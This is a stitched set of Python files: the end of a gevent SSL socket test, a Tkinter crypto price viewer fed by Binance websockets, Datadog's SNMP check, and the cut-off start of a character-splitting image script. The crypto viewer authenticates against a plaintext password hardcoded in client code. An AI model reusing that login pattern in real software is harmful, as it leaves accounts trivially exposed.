client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_open(client_socket, fileno)
f.close()
self.assert_closed(client_socket, fileno)
finally:
self.__cleanup(t, listener, connector)
@greentest.skipIf(greentest.RUNNING_ON_TRAVIS and greentest.PY37 and greentest.LIBUV,
"Often segfaults, cannot reproduce locally. "
"Not too worried about this before Python 3.7rc1. "
"https://travis-ci.org/gevent/gevent/jobs/327357684")
def test_serverssl_makefile2(self):
listener = socket.socket()
self._close_on_teardown(listener)
listener.bind(('127.0.0.1', 0))
port = listener.getsockname()[1]
listener.listen(1)
listener = ssl.wrap_socket(listener, keyfile=certfile, certfile=certfile)
connector = socket.socket()
def connect():
connector.connect(('127.0.0.1', port))
s = ssl.wrap_socket(connector)
s.sendall(b'test_serverssl_makefile2')
s.close()
connector.close()
t = threading.Thread(target=connect)
t.daemon = True
t.start()
try:
client_socket, _addr = listener.accept()
fileno = client_socket.fileno()
self.assert_open(client_socket, fileno)
f = client_socket.makefile()
self.assert_open(client_socket, fileno)
self.assertEqual(f.read(), 'test_serverssl_makefile2')
self.assertEqual(f.read(), '')
f.close()
if WIN and psutil:
# Hmm?
self.extra_allowed_open_states = (psutil.CONN_CLOSE_WAIT,)
self.assert_open(client_socket, fileno)
client_socket.close()
self.assert_closed(client_socket, fileno)
finally:
self.__cleanup(t, listener)
if __name__ == '__main__':
unittest.main()
|
Crypto Viewer.py
|
from tkinter import *
from tkinter import Tk
# LOGIN CHECK
def entrar():
email = txtboxemail_log.get()
senha = txtboxpass_log.get()
if (email=="" or senha==""):
erro_blank = Label(LoginFrame, text="Preencha os campos obrigatórios.", background='#111111', font="Segoe 20", fg="red")
erro_blank.place(relwidth=1, relx=0.5, rely=0.65, anchor=CENTER)
else:
if email == "crypto_viewer_user" and senha == "senhacv123":
# MAIN FRAME
root.destroy()
main = Tk()
main.configure(background='#111111')
main.title("Crypto Viewer")
main.attributes('-fullscreen', True)
# HEADER
headerFrame = Frame(main, background='#111111')
headerFrame.place(relwidth=1, relheight=0.2)
logo = Label(headerFrame, text="Crypto Viewer", background='#111111', font="Segoe 30 bold", fg="white")
logo.place(relwidth=1, relheight=1)
def exit():
main.destroy()
exit_bttn = Button(headerFrame, text="X", border="0", bg='#FF0000', fg="white", font="Segoe 20 bold", cursor="hand2", command=exit)
exit_bttn.place(relwidth=0.03, relheight=0.25, relx=0.97)
# SELECT CRYPTO
MainFrame = Frame(main, background='#111111')
MainFrame.place(relwidth=1, relheight=0.6, rely=0.2)
def sol_page():
sol = Tk()
sol.configure(background='#111111')
sol.title("Crypto Viewer")
sol.attributes('-fullscreen', True)
# HEADER
headerFrame = Frame(sol, background='#111111')
headerFrame.place(relwidth=1, relheight=0.2)
logo = Label(headerFrame, text="Crypto Viewer", background='#111111', font="Segoe 30 bold", fg="white")
logo.place(relwidth=1, relheight=1)
def exit():
main.destroy()
sol.destroy()
ws.close()
exit_bttn = Button(headerFrame, text="X", border="0", bg='#FF0000', fg="white", font="Segoe 20 bold", cursor="hand2", command=exit)
exit_bttn.place(relwidth=0.03, relheight=0.25, relx=0.97)
# INFO SOL
sol_frame = Frame(sol, background='#111111')
sol_frame.place(relwidth=1, relheight=0.6, rely=0.2)
label_sol = Label(sol_frame, text="SOLANA / DOLAR - SOLUSDT", border="0", bg='#111111', fg="white", font="Segoe 30 bold")
label_sol.place(relwidth=0.5, relheight=0.1, relx=0.25, rely=0.25)
lb_loading_sol = Label(sol_frame, text="Carregando...", border="0", bg='#111111', fg="white", font="Segoe 30 bold")
lb_loading_sol.place(relwidth=0.35, relheight=0.1, relx=0.325, rely=0.4)
import json, websocket
SOCKET = "wss://stream.binance.com:9443/ws/solusdt@kline_1m"
def on_message(ws, message):
valor_sol = json.loads(message)['k']['c']
def show_sol():
lb_val_sol = Label(sol_frame, text=valor_sol, border="0", bg='#FFFFFF', fg="black", font="Segoe 30 bold")
lb_val_sol.place(relwidth=0.35, relheight=0.1, relx=0.325, rely=0.4)
show_sol()
ws = websocket.WebSocketApp(SOCKET, on_message=on_message)
def back_sol():
sol.destroy()
ws.close()
sol_back = Button(sol_frame, text="Voltar", border="0", bg='black', fg="white", font="Segoe 30 bold", cursor="hand2", command=back_sol)
sol_back.place(relwidth=0.1, relheight=0.08, relx=0.45, rely=0.6)
# RUN WS
def connect_to_socket():
ws.run_forever()
def on_connect():
import threading
t = threading.Thread(target=connect_to_socket)
t.start()
on_connect()
# RUN SOL
sol.mainloop()
def btc_page():
btc = Tk()
btc.configure(background='#111111')
btc.title("Crypto Viewer")
btc.attributes('-fullscreen', True)
# HEADER
headerFrame = Frame(btc, background='#111111')
headerFrame.place(relwidth=1, relheight=0.2)
logo = Label(headerFrame, text="Crypto Viewer", background='#111111', font="Segoe 30 bold", fg="white")
logo.place(relwidth=1, relheight=1)
def exit():
main.destroy()
btc.destroy()
ws.close()
exit_bttn = Button(headerFrame, text="X", border="0", bg='#FF0000', fg="white", font="Segoe 20 bold", cursor="hand2", command=exit)
exit_bttn.place(relwidth=0.03, relheight=0.25, relx=0.97)
# INFO BTC
btc_frame = Frame(btc, background='#111111')
btc_frame.place(relwidth=1, relheight=0.6, rely=0.2)
label_btc = Label(btc_frame, text="BITCOIN / DOLAR - BTCUSDT", border="0", bg='#111111', fg="white", font="Segoe 30 bold")
label_btc.place(relwidth=0.5, relheight=0.1, relx=0.25, rely=0.25)
lb_loading_btc = Label(btc_frame, text="Carregando...", border="0", bg='#111111', fg="white", font="Segoe 30 bold")
lb_loading_btc.place(relwidth=0.35, relheight=0.1, relx=0.325, rely=0.4)
import json, websocket
SOCKET = "wss://stream.binance.com:9443/ws/btcusdt@kline_1m"
def on_message(ws, message):
valor_btc = json.loads(message)['k']['c']
def show_btc():
lb_val_btc = Label(btc_frame, text=valor_btc, border="0", bg='#FFFFFF', fg="black", font="Segoe 30 bold")
lb_val_btc.place(relwidth=0.35, relheight=0.1, relx=0.325, rely=0.4)
show_btc()
ws = websocket.WebSocketApp(SOCKET, on_message=on_message)
def back_btc():
btc.destroy()
ws.close()
btc_back = Button(btc_frame, text="Voltar", border="0", bg='black', fg="white", font="Segoe 30 bold", cursor="hand2", command=back_btc)
btc_back.place(relwidth=0.1, relheight=0.08, relx=0.45, rely=0.6)
# RUN WS
def connect_to_socket():
ws.run_forever()
def on_connect():
import threading
t = threading.Thread(target=connect_to_socket)
t.start()
on_connect()
# RUN BTC
btc.mainloop()
def eth_page():
eth = Tk()
eth.configure(background='#111111')
eth.title("Crypto Viewer")
eth.attributes('-fullscreen', True)
# HEADER
headerFrame = Frame(eth, background='#111111')
headerFrame.place(relwidth=1, relheight=0.2)
logo = Label(headerFrame, text="Crypto Viewer", background='#111111', font="Segoe 30 bold", fg="white")
logo.place(relwidth=1, relheight=1)
def exit():
main.destroy()
eth.destroy()
ws.close()
exit_bttn = Button(headerFrame, text="X", border="0", bg='#FF0000', fg="white", font="Segoe 20 bold", cursor="hand2", command=exit)
exit_bttn.place(relwidth=0.03, relheight=0.25, relx=0.97)
# INFO ETH
eth_frame = Frame(eth, background='#111111')
eth_frame.place(relwidth=1, relheight=0.6, rely=0.2)
label_eth = Label(eth_frame, text="ETHEREUM / DOLAR - ETHUSDT", border="0", bg='#111111', fg="white", font="Segoe 30 bold")
label_eth.place(relwidth=0.5, relheight=0.1, relx=0.25, rely=0.25)
lb_loading_eth = Label(eth_frame, text="Carregando...", border="0", bg='#111111', fg="white", font="Segoe 30 bold")
lb_loading_eth.place(relwidth=0.35, relheight=0.1, relx=0.325, rely=0.4)
import json, websocket
SOCKET = "wss://stream.binance.com:9443/ws/ethusdt@kline_1m"
def on_message(ws, message):
valor_eth = json.loads(message)['k']['c']
def show_eth():
lb_val_btc = Label(eth_frame, text=valor_eth, border="0", bg='#FFFFFF', fg="black", font="Segoe 30 bold")
lb_val_btc.place(relwidth=0.35, relheight=0.1, relx=0.325, rely=0.4)
show_eth()
ws = websocket.WebSocketApp(SOCKET, on_message=on_message)
def back_eth():
eth.destroy()
ws.close()
eth_back = Button(eth_frame, text="Voltar", border="0", bg='black', fg="white", font="Segoe 30 bold", cursor="hand2", command=back_eth)
eth_back.place(relwidth=0.1, relheight=0.08, relx=0.45, rely=0.6)
# RUN WS
def connect_to_socket():
ws.run_forever()
def on_connect():
import threading
t = threading.Thread(target=connect_to_socket)
t.start()
on_connect()
# RUN ETH
eth.mainloop()
btc_bttn = Button(MainFrame, text="BTC", border="1", bg='#FFFFFF', fg="black", font="Segoe 30 bold", cursor="hand2", command=btc_page)
btc_bttn.place(relwidth=0.1, relheight=0.08, relx=0.45, rely=0.3)
eth_bttn = Button(MainFrame, text="ETH", border="1", bg='#FFFFFF', fg="black", font="Segoe 30 bold", cursor="hand2", command=eth_page)
eth_bttn.place(relwidth=0.1, relheight=0.08, relx=0.45, rely=0.5)
sol_bttn = Button(MainFrame, text="SOL", border="1", bg='#FFFFFF', fg="black", font="Segoe 30 bold", cursor="hand2", command=sol_page)
sol_bttn.place(relwidth=0.1, relheight=0.08, relx=0.45, rely=0.7)
# RUN MAIN
main.mainloop()
else:
erro_invalidade = Label(LoginFrame, text="Usuário ou senha inválidos. Tente novamente.", background='#111111', font="Segoe 20", fg="red")
erro_invalidade.place(relwidth=1, relx=0.5, rely=0.65, anchor=CENTER)
# DEF EXIT
def exit():
root.destroy()
# INFO PAGE
def info():
txt_info_1 = "Crypto Viewer é um projeto Python desenvilvido para a visualização em tempo real do valor de criptomoedas."
txt_info_2 = "Desenvolvido por Henrique Soriano, estudante de Análise e desenvolvimento de Sistemas - Etec Polivalente Americana"
txt_info_3 = "email: sorianol.henrique@gmail.com"
txt_info_4 = "LinkedIn: linkedin.com/in/henrique-soriano-b6b623226"
# INFO FRAME
root.destroy()
info = Tk()
info.configure(background='#111111')
info.title("Crypto Viewer")
info.attributes('-fullscreen', True)
# HEADER
headerFrame = Frame(info, background='#111111')
headerFrame.place(relwidth=1, relheight=0.2)
logo = Label(headerFrame, text="Crypto Viewer", background='#111111', font="Segoe 30 bold", fg="white")
logo.place(relwidth=1, relheight=1)
def exit():
info.destroy()
exit_bttn = Button(headerFrame, text="X", border="0", bg='#FF0000', fg="white", font="Segoe 20 bold", cursor="hand2", command=exit)
exit_bttn.place(relwidth=0.03, relheight=0.25, relx=0.97)
# INFO
info_frame = Frame(info, background='#111111')
info_frame.place(relwidth=1, relheight=0.6, rely=0.2)
lb_loading_eth = Label(info_frame, text=txt_info_1, border="0", bg='#111111', fg="white", font="Segoe 15 bold")
lb_loading_eth.place(relwidth=1, relheight=0.1, rely=0.3)
lb_loading_eth = Label(info_frame, text=txt_info_2, border="0", bg='#111111', fg="white", font="Segoe 15 bold")
lb_loading_eth.place(relwidth=1, relheight=0.1, rely=0.4)
lb_loading_eth = Label(info_frame, text=txt_info_3, border="0", bg='#111111', fg="white", font="Segoe 15 bold")
lb_loading_eth.place(relwidth=1, relheight=0.1, rely=0.5)
lb_loading_eth = Label(info_frame, text=txt_info_4, border="0", bg='#111111', fg="white", font="Segoe 15 bold")
lb_loading_eth.place(relwidth=1, relheight=0.1, rely=0.6)
# MAIN INITIAL FRAME
root = Tk()
root.configure(background='#111111')
root.title("Crypto Viewer")
root.attributes('-fullscreen', True)
# HEADER
headerFrame = Frame(root, background='#111111')
headerFrame.place(relwidth=1, relheight=0.2)
logo = Label(headerFrame, text="Crypto Viewer", background='#111111', font="Segoe 30 bold", fg="white")
logo.place(relwidth=1, relheight=1)
def exit():
root.destroy()
exit_bttn = Button(headerFrame, text="X", border="0", bg='#FF0000', fg="white", font="Segoe 20 bold", cursor="hand2", command=exit)
exit_bttn.place(relwidth=0.03, relheight=0.25, relx=0.97)
# LOGIN
LoginFrame = Frame(root, background='#111111')
LoginFrame.place(relwidth=1, relheight=0.6, rely=0.2)
l_entrar = Label(LoginFrame, text="ENTRAR", background='#111111', font="Segoe 15 bold", fg="white")
l_entrar.place(relwidth=1, relheight=0.2)
l_email = Label(LoginFrame, text="Usuário", background='#111111', font="Segoe 15", fg="white")
l_email.place(relwidth=1, relheight=0.2, rely=0.15)
txtboxemail_log = Entry(LoginFrame, bg="#222222", border=0, fg="white", font="Segoe 15")
txtboxemail_log.place(relwidth=0.3, relheight=0.05, relx=0.35, rely=0.3)
l_pass = Label(LoginFrame, text="Senha", background='#111111', font="Segoe 15", fg="white")
l_pass.place(relwidth=1, relheight=0.2, rely=0.35)
txtboxpass_log = Entry(LoginFrame, bg="#222222", border=0, fg="white", font="Segoe 15", show="*")
txtboxpass_log.place(relwidth=0.3, relheight=0.05, relx=0.35, rely=0.5)
login_bttn = Button(LoginFrame, text="ENTRAR", border="0", bg='#222222', fg="white", font="Segoe 20 bold", cursor="hand2", command=entrar)
login_bttn.place(relwidth=0.1, relheight=0.085, relx=0.45, rely=0.75)
login_bttn = Button(LoginFrame, text="?", border="0", bg='white', fg="black", font="Segoe 16 bold", cursor="hand2", command=info)
login_bttn.place(relwidth=0.02, relheight=0.06, relx=0.8, rely=0.9)
# RUN ROOT
root.mainloop()
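# Note: each message the on_message handlers above receive from the Binance kline
# stream is JSON shaped roughly like {"e": "kline", "s": "<symbol>", "k": {..., "c": "<close>"}},
# so json.loads(message)['k']['c'] yields the latest close price as a string.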
|
snmp.py
|
# (C) Datadog, Inc. 2010-2019
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
import threading
import time
from collections import defaultdict
import pysnmp.proto.rfc1902 as snmp_type
import yaml
from pyasn1.codec.ber import decoder
from pysnmp import hlapi
from pysnmp.error import PySnmpError
from pysnmp.smi import builder
from pysnmp.smi.exval import noSuchInstance, noSuchObject
from six import iteritems
from datadog_checks.base import AgentCheck, ConfigurationError, is_affirmative
from datadog_checks.base.errors import CheckException
from .config import InstanceConfig
# Additional types that are not part of the SNMP protocol. cf RFC 2856
CounterBasedGauge64, ZeroBasedCounter64 = builder.MibBuilder().importSymbols(
'HCNUM-TC', 'CounterBasedGauge64', 'ZeroBasedCounter64'
)
# Metric type that we support
SNMP_COUNTERS = frozenset([snmp_type.Counter32.__name__, snmp_type.Counter64.__name__, ZeroBasedCounter64.__name__])
SNMP_GAUGES = frozenset(
[
snmp_type.Gauge32.__name__,
snmp_type.Unsigned32.__name__,
CounterBasedGauge64.__name__,
snmp_type.Integer.__name__,
snmp_type.Integer32.__name__,
]
)
DEFAULT_OID_BATCH_SIZE = 10
def reply_invalid(oid):
return noSuchInstance.isSameTypeWith(oid) or noSuchObject.isSameTypeWith(oid)
class SnmpCheck(AgentCheck):
SC_STATUS = 'snmp.can_check'
_running = True
_NON_REPEATERS = 0
_MAX_REPETITIONS = 25
def __init__(self, name, init_config, instances):
super(SnmpCheck, self).__init__(name, init_config, instances)
# Set OID batch size
self.oid_batch_size = int(init_config.get('oid_batch_size', DEFAULT_OID_BATCH_SIZE))
# Load Custom MIB directory
self.mibs_path = init_config.get('mibs_folder')
self.ignore_nonincreasing_oid = is_affirmative(init_config.get('ignore_nonincreasing_oid', False))
self.profiles = init_config.get('profiles', {})
self.profiles_by_oid = {}
for profile, profile_data in self.profiles.items():
filename = profile_data.get('definition_file')
if filename:
try:
with open(filename) as f:
data = yaml.safe_load(f)
except Exception:
raise ConfigurationError("Couldn't read profile '{}' in '{}'".format(profile, filename))
else:
data = profile_data['definition']
self.profiles[profile] = {'definition': data}
sys_object_oid = profile_data.get('sysobjectid')
if sys_object_oid:
self.profiles_by_oid[sys_object_oid] = profile
self.instance['name'] = self._get_instance_key(self.instance)
self._config = InstanceConfig(
self.instance,
self.warning,
self.init_config.get('global_metrics', []),
self.mibs_path,
self.profiles,
self.profiles_by_oid,
)
if self._config.ip_network:
self._thread = threading.Thread(target=self.discover_instances, name=self.name)
self._thread.daemon = True
self._thread.start()
def _get_instance_key(self, instance):
key = instance.get('name')
if key:
return key
ip = instance.get('ip_address')
port = instance.get('port')
if ip and port:
key = '{host}:{port}'.format(host=ip, port=port)
else:
key = ip
return key
def discover_instances(self):
config = self._config
discovery_interval = config.instance.get('discovery_interval', 3600)
while self._running:
start_time = time.time()
for host in config.ip_network.hosts():
host = str(host)
if host in config.discovered_instances:
continue
instance = config.instance.copy()
instance.pop('network_address')
instance['ip_address'] = host
host_config = InstanceConfig(
instance,
self.warning,
self.init_config.get('global_metrics', []),
self.mibs_path,
self.profiles,
self.profiles_by_oid,
)
try:
sys_object_oid = self.fetch_sysobject_oid(host_config)
except Exception as e:
self.log.debug("Error scanning host %s: %s", host, e)
continue
if sys_object_oid not in self.profiles_by_oid:
if not (host_config.table_oids or host_config.raw_oids):
self.log.warn("Host %s didn't match a profile for sysObjectID %s", host, sys_object_oid)
continue
else:
profile = self.profiles_by_oid[sys_object_oid]
host_config.refresh_with_profile(self.profiles[profile], self.warning)
config.discovered_instances[host] = host_config
time_elapsed = time.time() - start_time
if discovery_interval - time_elapsed > 0:
time.sleep(discovery_interval - time_elapsed)
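    # Illustrative instance configuration that drives the discovery loop above.
    # 'network_address' and 'discovery_interval' are the keys read by this method;
    # the remaining keys and all values are hypothetical examples:
    #
    #   network_address: 10.0.0.0/28
    #   port: 161
    #   community_string: public
    #   discovery_interval: 3600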
def raise_on_error_indication(self, error_indication, ip_address):
if error_indication:
message = '{} for instance {}'.format(error_indication, ip_address)
raise CheckException(message)
def check_table(self, config, table_oids):
"""
Perform a snmpwalk on the domain specified by the oids, on the device
configured in instance.
Returns a dictionary:
dict[oid/metric_name][row index] = value
In case of scalar objects, the row index is just 0
"""
results = defaultdict(dict)
enforce_constraints = config.enforce_constraints
oids = []
bulk_oids = []
        # Use bulk requests when the SNMP version is > 1 and there are enough symbols
bulk_limit = config.bulk_threshold if config.auth_data.mpModel else 0
for table, symbols in table_oids.items():
if not symbols:
# No table to browse, just one symbol
oids.append(table)
elif len(symbols) < bulk_limit:
oids.extend(symbols)
else:
bulk_oids.append(table)
all_binds, error = self.fetch_oids(config, oids, enforce_constraints=enforce_constraints)
for oid in bulk_oids:
try:
self.log.debug('Running SNMP command getBulk on OID %s', oid)
binds_iterator = config.call_cmd(
hlapi.bulkCmd,
self._NON_REPEATERS,
self._MAX_REPETITIONS,
oid,
lookupMib=enforce_constraints,
ignoreNonIncreasingOid=self.ignore_nonincreasing_oid,
lexicographicMode=False,
)
binds, error = self._consume_binds_iterator(binds_iterator, config)
all_binds.extend(binds)
except PySnmpError as e:
message = 'Failed to collect some metrics: {}'.format(e)
if not error:
error = message
self.warning(message)
for result_oid, value in all_binds:
if not enforce_constraints:
# if enforce_constraints is false, then MIB resolution has not been done yet
# so we need to do it manually. We have to specify the mibs that we will need
# to resolve the name.
oid_to_resolve = hlapi.ObjectIdentity(result_oid.asTuple()).loadMibs(*config.mibs_to_load)
result_oid = oid_to_resolve.resolveWithMib(config.mib_view_controller)
_, metric, indexes = result_oid.getMibSymbol()
results[metric][indexes] = value
self.log.debug('Raw results: %s', results)
# Freeze the result
results.default_factory = None
return results, error
def check_raw(self, config, oids):
"""
Perform a snmpwalk on the domain specified by the oids, on the device
configured in instance.
Returns a dictionary:
            dict[oid as a dotted string] = value
"""
all_binds, error = self.fetch_oids(config, oids, enforce_constraints=False)
results = {}
for result_oid, value in all_binds:
oid = result_oid.asTuple()
matching = '.'.join(str(i) for i in oid)
results[matching] = value
self.log.debug('Raw results: %s', results)
return results, error
def fetch_oids(self, config, oids, enforce_constraints):
# UPDATE: We used to perform only a snmpgetnext command to fetch metric values.
        # It returns the wrong value when the OID passed refers to a specific leaf.
# For example:
# snmpgetnext -v2c -c public localhost:11111 1.3.6.1.2.1.25.4.2.1.7.222
# iso.3.6.1.2.1.25.4.2.1.7.224 = INTEGER: 2
# SOLUTION: perform a snmpget command and fallback with snmpgetnext if not found
error = None
first_oid = 0
all_binds = []
while first_oid < len(oids):
try:
oids_batch = oids[first_oid : first_oid + self.oid_batch_size]
self.log.debug('Running SNMP command get on OIDS %s', oids_batch)
error_indication, error_status, _, var_binds = next(
config.call_cmd(hlapi.getCmd, *oids_batch, lookupMib=enforce_constraints)
)
self.log.debug('Returned vars: %s', var_binds)
self.raise_on_error_indication(error_indication, config.ip_address)
missing_results = []
for var in var_binds:
result_oid, value = var
if reply_invalid(value):
oid_tuple = result_oid.asTuple()
missing_results.append(hlapi.ObjectType(hlapi.ObjectIdentity(oid_tuple)))
else:
all_binds.append(var)
if missing_results:
# If we didn't catch the metric using snmpget, try snmpnext
# Don't walk through the entire MIB, stop at end of table
self.log.debug('Running SNMP command getNext on OIDS %s', missing_results)
binds_iterator = config.call_cmd(
hlapi.nextCmd,
*missing_results,
lookupMib=enforce_constraints,
ignoreNonIncreasingOid=self.ignore_nonincreasing_oid,
lexicographicMode=False
)
binds, error = self._consume_binds_iterator(binds_iterator, config)
all_binds.extend(binds)
except PySnmpError as e:
message = 'Failed to collect some metrics: {}'.format(e)
if not error:
error = message
self.warning(message)
# if we fail move onto next batch
first_oid += self.oid_batch_size
return all_binds, error
def fetch_sysobject_oid(self, config):
"""Return the sysObjectID of the instance."""
# Reference sysObjectID directly, see http://oidref.com/1.3.6.1.2.1.1.2
oid = hlapi.ObjectType(hlapi.ObjectIdentity((1, 3, 6, 1, 2, 1, 1, 2)))
self.log.debug('Running SNMP command on OID %s', oid)
error_indication, _, _, var_binds = next(config.call_cmd(hlapi.nextCmd, oid, lookupMib=False))
self.raise_on_error_indication(error_indication, config.ip_address)
self.log.debug('Returned vars: %s', var_binds)
return var_binds[0][1].prettyPrint()
def _consume_binds_iterator(self, binds_iterator, config):
all_binds = []
error = None
for error_indication, error_status, _, var_binds_table in binds_iterator:
self.log.debug('Returned vars: %s', var_binds_table)
self.raise_on_error_indication(error_indication, config.ip_address)
if error_status:
message = '{} for instance {}'.format(error_status.prettyPrint(), config.ip_address)
error = message
# submit CRITICAL service check if we can't connect to device
if 'unknownUserName' in message:
self.log.error(message)
else:
self.warning(message)
all_binds.extend(var_binds_table)
return all_binds, error
def check(self, instance):
"""
Perform two series of SNMP requests, one for all that have MIB associated
and should be looked up and one for those specified by oids.
"""
config = self._config
if instance.get('network_address'):
for host, discovered in list(config.discovered_instances.items()):
if self._check_with_config(discovered):
config.failing_instances[host] += 1
if config.failing_instances[host] > config.allowed_failures:
# Remove it from discovered instances, we'll re-discover it later if it reappears
config.discovered_instances.pop(host)
# Reset the failure counter as well
config.failing_instances.pop(host)
else:
                    # Reset the counter if it's not failing
config.failing_instances.pop(host, None)
else:
self._check_with_config(config)
def _check_with_config(self, config):
# Reset errors
instance = config.instance
error = table_results = raw_results = None
try:
if not (config.table_oids or config.raw_oids):
sys_object_oid = self.fetch_sysobject_oid(config)
if sys_object_oid not in self.profiles_by_oid:
raise ConfigurationError('No profile matching sysObjectID {}'.format(sys_object_oid))
profile = self.profiles_by_oid[sys_object_oid]
config.refresh_with_profile(self.profiles[profile], self.warning)
if config.table_oids:
self.log.debug('Querying device %s for %s oids', config.ip_address, len(config.table_oids))
table_results, error = self.check_table(config, config.table_oids)
self.report_table_metrics(config.metrics, table_results, config.tags)
if config.raw_oids:
self.log.debug('Querying device %s for %s oids', config.ip_address, len(config.raw_oids))
raw_results, error = self.check_raw(config, config.raw_oids)
self.report_raw_metrics(config.metrics, raw_results, config.tags)
except CheckException as e:
error = str(e)
self.warning(error)
except Exception as e:
if not error:
error = 'Failed to collect metrics for {} - {}'.format(instance['name'], e)
self.warning(error)
finally:
# Report service checks
sc_tags = ['snmp_device:{}'.format(instance['ip_address'])]
sc_tags.extend(instance.get('tags', []))
status = self.OK
if error:
status = self.CRITICAL
if raw_results or table_results:
status = self.WARNING
self.service_check(self.SC_STATUS, status, tags=sc_tags, message=error)
return error
def report_raw_metrics(self, metrics, results, tags):
"""
For all the metrics that are specified by OID, the configured OID either
exactly matches or is a prefix of the OID sent back by the device.
Use the instance configuration to find the name to give to the metric and
submit the results to the aggregator.
"""
for metric in metrics:
if 'OID' in metric:
forced_type = metric.get('forced_type')
queried_oid = metric['OID'].lstrip('.')
if queried_oid in results:
value = results[queried_oid]
else:
for oid in results:
if oid.startswith(queried_oid):
value = results[oid]
break
else:
self.log.warning('No matching results found for oid %s', queried_oid)
continue
name = metric.get('name', 'unnamed_metric')
metric_tags = tags
if metric.get('metric_tags'):
metric_tags = metric_tags + metric.get('metric_tags')
self.submit_metric(name, value, forced_type, metric_tags)
def report_table_metrics(self, metrics, results, tags):
"""
For each of the metrics specified as needing to be resolved with mib,
gather the tags requested in the instance conf for each row.
Submit the results to the aggregator.
"""
for metric in metrics:
forced_type = metric.get('forced_type')
if 'table' in metric:
index_based_tags = []
column_based_tags = []
for metric_tag in metric.get('metric_tags', []):
tag_key = metric_tag['tag']
if 'index' in metric_tag:
index_based_tags.append((tag_key, metric_tag.get('index')))
elif 'column' in metric_tag:
column_based_tags.append((tag_key, metric_tag.get('column')))
else:
self.log.warning('No indication on what value to use for this tag')
for value_to_collect in metric.get('symbols', []):
for index, val in iteritems(results[value_to_collect]):
metric_tags = tags + self.get_index_tags(index, results, index_based_tags, column_based_tags)
self.submit_metric(value_to_collect, val, forced_type, metric_tags)
elif 'symbol' in metric:
name = metric['symbol']
result = list(results[name].items())
if len(result) > 1:
self.log.warning('Several rows returned while the metric is supposed to be a scalar')
continue
val = result[0][1]
metric_tags = tags
if metric.get('metric_tags'):
metric_tags = metric_tags + metric.get('metric_tags')
self.submit_metric(name, val, forced_type, metric_tags)
elif 'OID' in metric:
pass # This one is already handled by the other batch of requests
else:
raise ConfigurationError('Unsupported metric in config file: {}'.format(metric))
def get_index_tags(self, index, results, index_tags, column_tags):
"""
Gather the tags for this row of the table (index) based on the
results (all the results from the query).
index_tags and column_tags are the tags to gather.
- Those specified in index_tags contain the tag_group name and the
index of the value we want to extract from the index tuple.
cf. 1 for ipVersion in the IP-MIB::ipSystemStatsTable for example
- Those specified in column_tags contain the name of a column, which
could be a potential result, to use as a tag.
cf. ifDescr in the IF-MIB::ifTable for example
"""
tags = []
for idx_tag in index_tags:
tag_group = idx_tag[0]
try:
tag_value = index[idx_tag[1] - 1].prettyPrint()
except IndexError:
self.log.warning('Not enough indexes, skipping this tag')
continue
tags.append('{}:{}'.format(tag_group, tag_value))
for col_tag in column_tags:
tag_group = col_tag[0]
try:
tag_value = results[col_tag[1]][index]
except KeyError:
self.log.warning('Column %s not present in the table, skipping this tag', col_tag[1])
continue
if reply_invalid(tag_value):
self.log.warning("Can't deduct tag from column for tag %s", tag_group)
continue
tag_value = tag_value.prettyPrint()
tags.append('{}:{}'.format(tag_group, tag_value))
return tags
def submit_metric(self, name, snmp_value, forced_type, tags=None):
"""
Convert the values reported as pysnmp-Managed Objects to values and
report them to the aggregator.
"""
tags = [] if tags is None else tags
if reply_invalid(snmp_value):
# Metrics not present in the queried object
self.log.warning('No such Mib available: %s', name)
return
metric_name = self.normalize(name, prefix='snmp')
if forced_type:
if forced_type.lower() == 'gauge':
value = int(snmp_value)
self.gauge(metric_name, value, tags)
elif forced_type.lower() == 'counter':
value = int(snmp_value)
self.rate(metric_name, value, tags)
else:
self.warning('Invalid forced-type specified: {} in {}'.format(forced_type, name))
raise ConfigurationError('Invalid forced-type in config file: {}'.format(name))
return
# Ugly hack but couldn't find a cleaner way
# Proper way would be to use the ASN1 method isSameTypeWith but it
# wrongfully returns True in the case of CounterBasedGauge64
# and Counter64 for example
snmp_class = snmp_value.__class__.__name__
if snmp_class in SNMP_COUNTERS:
value = int(snmp_value)
self.rate(metric_name, value, tags)
return
if snmp_class in SNMP_GAUGES:
value = int(snmp_value)
self.gauge(metric_name, value, tags)
return
if snmp_class == 'Opaque':
# Try support for floats
try:
value = float(decoder.decode(bytes(snmp_value))[0])
except Exception:
pass
else:
self.gauge(metric_name, value, tags)
return
# Falls back to try to cast the value.
try:
value = float(snmp_value)
except ValueError:
pass
else:
self.gauge(metric_name, value, tags)
return
self.log.warning('Unsupported metric type %s for %s', snmp_class, metric_name)
|
koriru1.2C-GUI.py
|
# When cutting off glyph 1 the split is usually around columns 20~40; for the other digits it is around columns 80~100
from PIL import Image
import numpy as np
import os,sys,time
import progressbar
import copy as cp
import requests
import json,base64
import tkinter.filedialog
import tkinter as tk
import threading
wid=['[',progressbar.Timer(),']',progressbar.Bar(),'(',progressbar.ETA(),')',]
def check_dot(mmp):  # take a matrix, check whether it contains circles of diameter 20, return a matrix marking those circle centres
aap=cp.deepcopy(mmp)
for ii in progressbar.progressbar(range(len(mmp)),widgets=wid):
for jj in range(len(mmp[ii])):
rou_ctr=0
if mmp[ii][jj]!=255 and ii>9 and jj>9 and ii<len(mmp)-10 and jj<len(mmp[ii])-10:
for k in range(ii-10,ii+10):
for l in range(jj-10,jj+10):
if mmp[k][l]!=255:
rou_ctr=rou_ctr+1
if rou_ctr>=400:
aap[ii][jj]=255
else:
aap[ii][jj]=0
updatePb(ii,len(mmp))
return aap
def split_text_on_pic(mmp,cutctr):  # cut one character off the input matrix and return the two resulting images
cut_col=0
for jj in range(len(mmp[0])):
color=0
for ii in range(len(mmp)):
if mmp[ii][jj]!=0:
color=1
if color==0:
cut_col=jj
break
#np.savetxt(os.path.dirname(sys.path[0])+'\\WA.txt',mmp)
a=Image.fromarray(mmp)
#a.show()
#Image.fromarray(mmp).save(os.path.dirname(sys.path[0])+'\\WAA.gif')
least_color=19260817
if cut_col>105 or (cut_col==0 and len(mmp[0])>105):
for jj in range(20,40):
col_color=0
for ii in range(len(mmp)):
if mmp[ii][jj]!=0:
col_color=col_color+1
if col_color<least_color:
least_color=col_color
cut_col=jj
for jj in range(80,105):
col_color=0
for ii in range(len(mmp)):
if mmp[ii][jj]!=0:
col_color=col_color+1
if col_color<least_color:
least_color=col_color
cut_col=jj
